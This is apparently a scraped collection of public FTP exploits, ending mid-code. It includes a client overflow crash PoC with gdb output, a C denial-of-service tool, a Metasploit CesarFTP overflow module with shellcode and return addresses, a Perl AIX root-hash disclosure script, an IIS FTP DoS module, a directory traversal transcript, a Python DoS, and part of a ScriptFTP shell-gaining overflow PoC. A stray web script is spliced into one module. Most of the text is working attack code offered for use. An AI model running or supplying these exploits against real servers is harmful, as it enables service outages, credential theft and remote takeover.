7ffff7996000-7ffff7b95000 ---p 00040000 08:03 1439035 /lib/libncurses.so.5.7
7ffff7b95000-7ffff7b99000 r--p 0003f000 08:03 1439035 /lib/libncurses.so.5.7
7ffff7b99000-7ffff7b9a000 rw-p 00043000 08:03 1439035 /lib/libncurses.so.5.7
7ffff7b9a000-7ffff7bd3000 r-xp 00000000 08:03 1439066 /lib/libreadline.so.6.2
7ffff7bd3000-7ffff7dd3000 ---p 00039000 08:03 1439066 /lib/libreadline.so.6.2
7ffff7dd3000-7ffff7dd5000 r--p 00039000 08:03 1439066 /lib/libreadline.so.6.2
7ffff7dd5000-7ffff7ddb000 rw-p 0003b000 08:03 1439066 /lib/libreadline.so.6.2
7ffff7ddb000-7ffff7ddc000 rw-p 00000000 00:00 0
7ffff7ddc000-7ffff7dfd000 r-xp 00000000 08:03 1442931 /lib/x86_64-linux-gnu/ld-2.13.so
7ffff7fcf000-7ffff7fd3000 rw-p 00000000 00:00 0
7ffff7ff5000-7ffff7ffb000 rw-p 00000000 00:00 0
7ffff7ffb000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00020000 08:03 1442931 /lib/x86_64-linux-gnu/ld-2.13.so
7ffff7ffd000-7ffff7fff000 rw-p 00021000 08:03 1442931 /lib/x86_64-linux-gnu/ld-2.13.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Program received signal SIGABRT, Aborted.
0x00007ffff75f5d05 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
64 ../nptl/sysdeps/unix/sysv/linux/raise.c: No existe el fichero o el directorio.
in ../nptl/sysdeps/unix/sysv/linux/raise.c
(gdb) i r
rax 0x0 0
rbx 0x0 0
rcx 0xffffffffffffffff -1
rdx 0x6 6
rsi 0x5dea 24042
rdi 0x5dea 24042
rbp 0x7fffffffcfd0 0x7fffffffcfd0
rsp 0x7fffffffc608 0x7fffffffc608
r8 0x7ffff770d8c0 140737344755904
r9 0x400660 4195936
r10 0x8 8
r11 0x246 582
r12 0x9 9
r13 0x3a 58
r14 0x3a 58
r15 0x5 5
rip 0x7ffff75f5d05 0x7ffff75f5d05 <raise+53>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb)
============================================================================================================================================================
Backtrack 5 R1:
===============
(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xb7eea390]
/lib/tls/i686/cmov/libc.so.6(+0xe12ca)[0xb7ee92ca]
/lib/tls/i686/cmov/libc.so.6(+0xe07de)[0xb7ee87de]
/usr/bin/ftp[0x804b57c]
/usr/bin/ftp[0x8055abd]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7e1ebd6]
/usr/bin/ftp[0x8049cb1]
======= Memory map: ========
08048000-08059000 r-xp 00000000 08:01 153580 /usr/bin/netkit-ftp
08059000-0805a000 r--p 00010000 08:01 153580 /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00011000 08:01 153580 /usr/bin/netkit-ftp
0805b000-0808a000 rw-p 00000000 00:00 0 [heap]
b7d58000-b7d75000 r-xp 00000000 08:01 1180 /lib/libgcc_s.so.1
b7d75000-b7d76000 r--p 0001c000 08:01 1180 /lib/libgcc_s.so.1
b7d76000-b7d77000 rw-p 0001d000 08:01 1180 /lib/libgcc_s.so.1
b7d88000-b7d8f000 r--s 00000000 08:01 159757 /usr/lib/gconv/gconv-modules.cache
b7d8f000-b7dce000 r--p 00000000 08:01 161313 /usr/lib/locale/en_US.utf8/LC_CTYPE
b7dce000-b7dd6000 r-xp 00000000 08:01 5501 /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd6000-b7dd7000 r--p 00007000 08:01 5501 /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd7000-b7dd8000 rw-p 00008000 08:01 5501 /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd8000-b7deb000 r-xp 00000000 08:01 5491 /lib/tls/i686/cmov/libnsl-2.11.1.so
b7deb000-b7dec000 r--p 00012000 08:01 5491 /lib/tls/i686/cmov/libnsl-2.11.1.so
b7dec000-b7ded000 rw-p 00013000 08:01 5491 /lib/tls/i686/cmov/libnsl-2.11.1.so
b7ded000-b7def000 rw-p 00000000 00:00 0
b7def000-b7df5000 r-xp 00000000 08:01 5493 /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df5000-b7df6000 r--p 00006000 08:01 5493 /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df6000-b7df7000 rw-p 00007000 08:01 5493 /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df7000-b7e01000 r-xp 00000000 08:01 5497 /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e01000-b7e02000 r--p 00009000 08:01 5497 /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e02000-b7e03000 rw-p 0000a000 08:01 5497 /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e03000-b7e04000 rw-p 00000000 00:00 0
b7e04000-b7e06000 r-xp 00000000 08:01 5486 /lib/tls/i686/cmov/libdl-2.11.1.so
b7e06000-b7e07000 r--p 00001000 08:01 5486 /lib/tls/i686/cmov/libdl-2.11.1.so
b7e07000-b7e08000 rw-p 00002000 08:01 5486 /lib/tls/i686/cmov/libdl-2.11.1.so
b7e08000-b7f5b000 r-xp 00000000 08:01 5480 /lib/tls/i686/cmov/libc-2.11.1.so
b7f5b000-b7f5c000 ---p 00153000 08:01 5480 /lib/tls/i686/cmov/libc-2.11.1.so
b7f5c000-b7f5e000 r--p 00153000 08:01 5480 /lib/tls/i686/cmov/libc-2.11.1.so
b7f5e000-b7f5f000 rw-p 00155000 08:01 5480 /lib/tls/i686/cmov/libc-2.11.1.so
b7f5f000-b7f63000 rw-p 00000000 00:00 0
b7f63000-b7f97000 r-xp 00000000 08:01 1200 /lib/libncurses.so.5.7
b7f97000-b7f98000 ---p 00034000 08:01 1200 /lib/libncurses.so.5.7
b7f98000-b7f9a000 r--p 00034000 08:01 1200 /lib/libncurses.so.5.7
b7f9a000-b7f9b000 rw-p 00036000 08:01 1200 /lib/libncurses.so.5.7
b7f9b000-b7fca000 r-xp 00000000 08:01 1267 /lib/libreadline.so.6.1
b7fca000-b7fcb000 r--p 0002e000 08:01 1267 /lib/libreadline.so.6.1
b7fcb000-b7fce000 rw-p 0002f000 08:01 1267 /lib/libreadline.so.6.1
b7fce000-b7fcf000 rw-p 00000000 00:00 0
b7fdc000-b7fe2000 rw-p 00000000 00:00 0
b7fe2000-b7fe3000 r-xp 00000000 00:00 0 [vdso]
b7fe3000-b7ffe000 r-xp 00000000 08:01 1123 /lib/ld-2.11.1.so
b7ffe000-b7fff000 r--p 0001a000 08:01 1123 /lib/ld-2.11.1.so
b7fff000-b8000000 rw-p 0001b000 08:01 1123 /lib/ld-2.11.1.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
Program received signal SIGABRT, Aborted.
0xb7fe2422 in __kernel_vsyscall ()
(gdb) i r
eax 0x0 0
ecx 0x659 1625
edx 0x6 6
ebx 0x659 1625
esp 0xbfffdbfc 0xbfffdbfc
ebp 0xbfffdc08 0xbfffdc08
esi 0x0 0
edi 0xb7f5dff4 -1208623116
eip 0xb7fe2422 0xb7fe2422 <__kernel_vsyscall+2>
eflags 0x200246 [ PF ZF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
Another Linux distribution did not crash, here is the example with Slackware 12:
================================================================================
Slackware 12:
=============
root@sl4ck1e:~# ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sorry, input line too long
ftp>
Ubuntu versions 11.04 and below ftp client local buffer overflow crash proof of concept exploit.
Jonathan Salwan/XM Easy Personal FTP Server DoS ( na)
/*
XM Easy Personnal FTP Server <= 5.7.0
Remote Denial of Service with Request (NLST)
---------------------------------------------------------------------------------------------------------
The vulnerability is caused due to an error in handling the NLST command. This can be exploited to crash
the FTP service by sending the "NLST" with NULL argument.
---------------------------------------------------------------------------------------------------------
Author: Jonathan Salwan
Mail : submit [AT] shell-storm.org
Web : http://www.shell-storm.org
*/
#include "stdio.h"
#include "unistd.h"
#include "stdlib.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "netinet/in.h"
int syntax(char *file)
{
fprintf(stderr,"XM Easy Personnal FTP Server <= 5.7.0\n");
fprintf(stderr,"=>Syntax : <%s> <ip> <port> <login> <passwd>\n",file);
fprintf(stdout,"=>Exemple : %s 127.0.0.1 21 login1 password1\n",file);
exit(0);
}
int main(int argc, char **argv)
{
if (argc < 4)
syntax(argv[0]);
int port = atoi(argv[2]);
int mysocket;
int mysocket2;
int srv_connect;
int sockaddr_long;
struct sockaddr_in sockaddr_mysocket;
sockaddr_long = sizeof(sockaddr_mysocket);
sockaddr_mysocket.sin_family = AF_INET;
sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]);
sockaddr_mysocket.sin_port = htons(port);
char request[50];
char answer[200];
fprintf(stdout,"[+]Connect to Server %s\n",argv[1]);
mysocket2 = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket2 == -1){
fprintf(stderr,"[-]FAILED SOCKET\n");
return 1;}
srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long);
if (srv_connect != -1)
{
memset(answer,0,200);
recv(mysocket2,answer,sizeof(answer),0);
sprintf(request, "USER %s\r\n", argv[3]);
if (send(mysocket2,request,strlen(request),0) == -1){
fprintf(stderr,"[-]Send Request USER\t\t[FAILED]\n");
shutdown(mysocket2,1);
return 1;}
else{
memset(answer,0,200);
recv(mysocket2,answer,sizeof(answer),0);
}
sprintf(request, "PASS %s\r\n", argv[4]);
if (send(mysocket2,request,strlen(request),0) == -1){
fprintf(stderr,"[-]Send Request PASS\t\t[FAILED]\n");
shutdown(mysocket2,1);
return 1;}
else{
memset(answer,0,200);
recv(mysocket2,answer,sizeof(answer),0);
}
sprintf(request, "NLST\r\n");
if (send(mysocket2,request,strlen(request),0) == -1){
fprintf(stderr,"[-]Send Request NLST\t\t[FAILED]\n");
shutdown(mysocket2,1);
return 1;}
}
else{
fprintf(stderr,"[-]Connect\t\t[FAILED]\n");
shutdown(mysocket2,1);
return 1;}
shutdown(mysocket2,1);
fprintf(stdout,"[+]Done! %s has been Crashed\n", argv[1]);
return 0;
}
XM Easy Personal FTP Server versions 5.7.0 and below NLST remote denial of service exploit.
c0rrupt/CesarFTP099g-pm.txt ( na)
##
#---ORIGINAL CREDITS TO h07 FOR FINDING THIS VULN---
# Ported to metasploit by c0rrupt
# ~ f34r.us ~
##
package Msf::Exploit::cesarftp_mkd;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'CesarFTP 0.99g Buffer Overflow',
'Version' => '$Revision: 1.3 $',
'Authors' => [ 'c0rrupt [at] f34r [dot] us', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'USER', 'Login name'],
'PASS' => [1, 'PASS', 'Password'],
},
'Payload' =>
{
'Space' => 325,
'BadChars' => "\x00\x09\x0a\x0d\x22\x25\x26\x27\x2f\x3a\x3e\x3f\xFF\x5c",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer overflow found in the MKD command
in CesarFTP 0.99g. It is required that the user be properly logged in
before the exploit can be peformed.
}),
'Refs' =>
[
['URL', 'http://www.milw0rm.com/exploits/1906']
],
'DefaultTarget' => 0,
'Targets' =>
[
['Windows XP SP2 English', 0x7746F114 ], # comctl32
['Windows XP SP0/SP1 English', 0x776606af ],
['Windows 2003 server sp0/xp sp1 English', 0x77798428 ],
['Windows 2003 server SP1 English', 0x7caa9618 ],
['Windows 2000 SP4 English', 0x78344dd3 ],
],
'Keys' => ['ceasarftp'],
'DisclosureDate' => 'June 12 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $user = $self->GetVar('USER');
my $pass = $self->GetVar('PASS');
my $buf = "MKD " . "\n"x671 . "A"x3 . pack('V', $target->[1]) . $shellcode . "\x0d\x0a";
#pack('V', $target->[1])
#"\x23\x79\xAB\x71"
$self->PrintLine(sprintf("[*] Trying to exploit target %s ", $target->[0], ));
my $sock = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($sock->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $sock->GetError);
return;
}
my $r = $sock->Recv(-1, 20);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->PrintLine(sprintf("[*] Sending login credentials"));
$sock->Send("USER $user" . "\x0d\x0a");
sleep(1);
$sock->Send("PASS $pass" . "\x0d\x0a");
sleep(1);
$self->PrintLine(sprintf("[*] Sending evil request"));
$sock->Send($buf);
$self->PrintLine(sprintf("[*] Exploit complete"));
return;
}
CesarFTP 0.99g (MKD) remote buffer overflow exploit written for Metasploit.
Kingcope/AIX5l FTP Server Remote Root Hash Disclosure ( na)
### AIXCOREDUMP.PL ---
### --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--
### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd
### THE RESULT FILE IS SCRAMBLED - SEEK FOR DES LOOKING CRYPTO KEYS
### SUCCESSFULLY TESTED ON IBM AIX 5.1
### DISCOVERED & EXPLOITED BY KINGCOPE
### JULY 2010
use IO::Socket;
$|=1;
print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--\n";
print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd\n";
print "BY KINGCOPE\n";
print "JULY 2010\n\n";
if ($#ARGV < 1) {
print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]\n";
print "SAMPLES:\n";
print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwd\n";
print "USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25\n";
exit;
}
$trgt = $ARGV[0];
$sock = IO::Socket::INET->new(PeerAddr => $trgt,
PeerPort => '21',
Proto => 'tcp');
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if ($ARGV[2] eq "") {
$user = "ftp";
$pass = "c0deb4b3\@roothash.com";
} else {
$user = $ARGV[2];
$passwd = $ARGV[3];
}
$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $x\n";
if (fork()) {
for ($k=0;$k<3;$k++) {
print "*AIX EXPLOIT* POLLUTING FTPD***\n";
print "\t$x";
print $sock "USER root\r\n";
$x = <$sock>;
print "\t$x";
print $sock "PASS sexy\r\n";
$x = <$sock>;
print "\t$x";
}
print "*AIX EXPLOIT* ACCESSING FOLDER***\n";
print $sock "USER $user\r\n";
$x = <$sock>;
print "\t$x";
print $sock "PASS $passwd\r\n";
$x = <$sock>;
print "\t$x";
if ($ARGV[2] eq "") {
print "*AIX EXPLOIT* CWD TO PUB***\n";
print $sock "CWD pub\r\n";
$x = <$sock>;
print "\t$x";
}
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print "\t$x";
print "*AIX EXPLOIT* TRIGGERING COREDUMP***\n";
print $sock "NLST ~" . "A" x 5000 . "\r\n";
$x = <$sock>;
while(<$sock>) {
print;
}
print "*AIX EXPLOIT* (SUCCESS)***\n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***\n";
exit;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
## CHEERIO!
AIX5l with FTP server remote root hash disclosure exploit. Creates a coredump including the root user hash from /etc/security/passwd.
Kingcope/Microsoft IIS FTP Server 7.0 Stack Exhaustion ( na)
# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS
# Date: Jul 03, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://www.microsoft.com/
# Version: 5.0 - 7.0
# Tested on: unpatched version of windows xp & 2k3
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service',
'Description' => %q{
This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. This exploit is especially meant for the service which is configured as "manual" mode in startup type.
},
'Author' => [
'Nikolaos "Kingcope" Rangos', # Bug Discoverer
'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1.0 $',
'References' =>
[
[ 'CVE', '2009-2521'],
[ 'BID', '36273'],
[ 'OSVDB', '57753'],
[ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']
],
'DisclosureDate' => 'Sep 03 2009'))
register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'mozilla@example.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>' ])
])
end
def run
return unless connect_login
print_status("Sending DoS packets ...")
send_cmd_data(['ls','-R */../'],nil)
disconnect
print_good("Done")
end
end
This Metasploit module triggers a denial of service condition in the Microsoft Internet Information Services (IIS) FTP Server versions 5.0 through 7.0 via a list (ls) -R command containing a wildcard. This exploit is especially meant for the service which is configured as "manual" mode in startup type.
Pawel h0wl Wyleci./FileCOPA FTP Server 6.01 directory traversal ( windows)
# Exploit title: FileCOPA FTP Server 6.01 directory traversal # Date: 07.11.2010 # Software Link: http://www.filecopa-ftpserver.com/ # Version: 6.01 # Tested on: Windows XP SP3 Professional # Author: Pawel h0wl Wylecial #.::Cyber-Crime Team::. # http://cc-team.org # http://h0wl.baywords.com Details: 220-InterVations FileCOPA FTP Server Version 6.01 2nd November 2010 220 Trial Version. 30 days remaining user anonymous 331 Password required for anonymous pass asd 230 User anonymous logged in. pasv 227 Entering Passive Mode (0,0,0,0,15,160) list ..\..\ 150 Opening ASCII mode data connection for file list 11-14-09 11:49PM 0 AUTOEXEC.BAT 11-14-09 11:43PM 211 boot.ini 04-15-08 01:00PM 4952 Bootfont.bin 11-07-10 04:45PM <DIR> Config.Msi 11-14-09 11:49PM 0 CONFIG.SYS 11-14-09 11:56PM <DIR> Documents and Settings 11-14-09 11:49PM 0 IO.SYS 11-14-09 11:49PM 0 MSDOS.SYS 04-15-08 01:00PM 47564 NTDETECT.COM 04-15-08 01:00PM 251152 ntldr 11-07-10 05:45PM 1610612736 pagefile.sys 11-07-10 04:47PM <DIR> Program Files 11-15-09 12:16AM <DIR> RECYCLER 11-14-09 11:53PM <DIR> System Volume Information 11-07-10 06:29PM <DIR> WINDOWS 226 Transfer complete. 220-InterVations FileCOPA FTP Server Version 6.01 2nd November 2010 220 Trial Version. 30 days remaining user anonymous 331 Password required for anonymous pass asd 230 User anonymous logged in. pasv 227 Entering Passive Mode (0,0,0,0,15,160) cwd ..\..\ 250 CWD command successful. retr boot.ini 150 Opening ASCII mode data connection for boot.ini (211 bytes) [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect 226 Transfer complete.
LiquidWorm/Mini FTP Server 1.1 Denial Of Service ( na)
#!/usr/bin/python
#
#
# Mini FTP Server 1.1 Buffer Corruption Remote Denial Of Service Exploit
#
#
# Vendor: webmaster442
# Product web page: http://miniftpserver.codeplex.com
# Affected version: 1.1.1.0
#
# Summary: Minimal FTP server for windows. Uses only managed code. Works
# with Total commander.
#
# Desc: MiniFTPServer suffers from a denial of service vulnerability
# when passing large number of bytes after authentication, resulting
# in a crash. No need for a valid FTP command to exploit this issue.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
# -----------------------------------------------------------------
#
# (1540.918): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00e4f900 ebx=00000000 ecx=00000000 edx=00f163e8 esi=00e4f900 edi=055ef384
# eip=031187d3 esp=055ef154 ebp=055ef394 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 031187d3 3909 cmp dword ptr [ecx],ecx ds:0023:00000000=????????
# 0:011> d edx
# 00f163e8 80 6a 9f 7a 28 f9 c5 00-00 00 00 00 64 f1 dc 00 .j.z(.......d...
# 00f163f8 54 72 f1 00 00 00 00 00-00 00 00 00 01 00 00 80 Tr..............
# 00f16408 00 00 00 00 4c 64 f1 00-00 00 00 00 00 00 00 00 ....Ld..........
# 00f16418 18 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
# 00f16428 b0 f1 dc 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
# 00f16438 00 00 00 00 00 00 00 00-f4 01 00 00 50 f9 e4 00 ............P...
# 00f16448 00 00 00 00 68 b4 b9 79-00 00 00 00 70 64 f1 00 ....h..y....pd..
# 00f16458 00 00 00 00 00 00 00 00-00 00 00 00 80 72 f1 00 .............r..
# 0:011> d
# 00f16468 00 00 00 00 00 00 00 00-f0 b0 5c 7b 00 00 00 00 ..........\{....
# 00f16478 80 9f b9 00 84 64 f1 00-00 00 01 00 60 9e b9 79 .....d......`..y
# 00f16488 c4 1a a0 00 00 00 00 00-00 00 00 00 ac f9 b9 79 ...............y
# 00f16498 f4 01 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
# 00f164a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 00f164b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 00f164c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
# 00f164d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#
# -----------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2011-5040
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5040.php
#
#
# 28.08.2011
#
import socket, sys
if len(sys.argv) < 2:
print ("\n===============================================")
print ("\nMini FTP Server 1.1 Remote DoS Exploit\n")
print ("Zero Science Lab - http://www.zeroscience.mk")
print ("\nID: ZSL-2011-5040")
print ("\n===============================================")
print ("\n - Usage: "+ sys.argv[0] +" [hostname]\n")
sys.exit(0)
host = (sys.argv[1])
data = ("A@" * 50000) #Any char and combination would do
cmd = ('ALLO') #Any CMD would do, or no CMD at all
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("\r\n[+] Attacking: " + host +"\r\n")
print ("[*] Please be patient...\r\n")
try:
s.connect((host, 21))
r=s.recv(1024)
print (r)
s.send("USER username\r\n")
r=s.recv(1024)
print (r)
s.send("PASS password\r\n")
r=s.recv(1024)
print (r)
s.send(cmd + " " + data + '\r\n')
r=s.recv(1024)
print (r)
print ("[*] Please be patient...\r\n")
for x in range(0,10): s.send(cmd + " " + data + '\r\n')
r=s.recv(1024)
print (r)
s.close()
try: s.connect((host,21))
except: print ("\r\n[*] Host is down!")
except: print ("[*] Oops!")
Mini FTP Server version 1.1 buffer corruption remote denial of service exploit.
modpr0be/ScriptFTP 3.3 Buffer Overflow ( na)
# Exploit Title: ScriptFTP <=3.3 Remote Buffer Overflow (LIST)
# Date: September 20, 2011
# Author: modpr0be
# Software Link: http://www.scriptftp.com/ScriptFTP_3_3_setup.exe
# Version: 3.3
# Tested on: Windows XP SP3, Windows Server 2003 SP1 (SE) (VMware 3.1.4 build-385536)
# CVE : -
#
# Thanks: offsec, exploit-db, corelanc0d3r, 5M7X, loneferret, mr_me, _sinner
#
# You should create your own script to work with ScriptFTP
# for example; enable passive and get the remote directory
# on your evil ftp server.
#
# my example script:
# OPENHOST("8.8.8.8","ftp","ftp")
# SETPASSIVE(ENABLED)
# GETLIST($list,REMOTE_FILES)
# CLOSEHOST
# save it to a file with .ftp extension (eg: exploit.ftp)
# root@bt :/# python scriptftp-bof-poc.py
# [*] ScriptFTP 3.3 Remote Buffer Overflow POC
# [*] by modpr0be[at]digital-echidna[dot]org.
# [*] thanks a lot to cyb3r.anbu | otoy :)
# =============================================
# [*] Evil FTP Server Ready
# [*] Server initiated.
# [*] Awaiting connection...
# [*] Connection created by 172.16.87.129.
# [*] Establishing session.
# [*] Pwning in progress..
# [*] This may take up 50 seconds or less.
# [!] Hunter is hunting the Egg ;)
# [!] Waiting for a shell..
# [!] 0wn3d..!
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\ScriptFTP>
#
# Yes, this poc is using PASSIVE connection and it will
# take some time to establish. I love the way we wait for a shell ;)
#!/usr/bin/python
import socket
import os
import sys
import time
class ftp_server:
def __init__(self):
self.host = '0.0.0.0'
self.passive_port = 7214
self.log("""
[*] ScriptFTP <=3.3 Remote Buffer Overflow POC
[*] by modpr0be[at]digital-echidna[dot]org
[*] thanks a lot to cyb3r.anbu | otoy :)
=============================================
[*] Evil FTP Server Ready""")
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind(('', 21))
self.sock.listen(1)
a = self.passive_port/256
b = self.passive_port%256
self.tuple_port = (a, b)
self.host_join = ','.join(self.host.split('.'))
self.passive = False
self.log("[*] Server initiated.")
def log(self, msg):
print msg
def get(self):
return self.conn.recv(1024).replace('\r', '').replace('\n', '')
def getcwd(self):
return os.getcwd().split(chr(92))[-1]
def put(self, ftr):
x = {
150:" Data connection accepted from %s:%s; transfer starting.\r\n226 Listing completed."%(self.host, self.passive_port),
200:" Type okay.",
220:" %s Server is ready."%self.host,
226:" Listing completed.",
227:" Entering Passive Mode (%s,%s,%s)"%(self.host_join, self.tuple_port[0], self.tuple_port[1]),
230:" User logged in, proceed.",
250:' "/%s" is new cwd.'%self.getcwd(),
257:' "/%s" is cwd.'%self.getcwd(),
331:" User name okay, need password.",
502:" Command not implemented.",
551:" Requested action aborted. Page type unknown."
}[ftr]
s = '%s%s\r\n'%(ftr, x)
self.conn.send(s)
return s
def main(self):
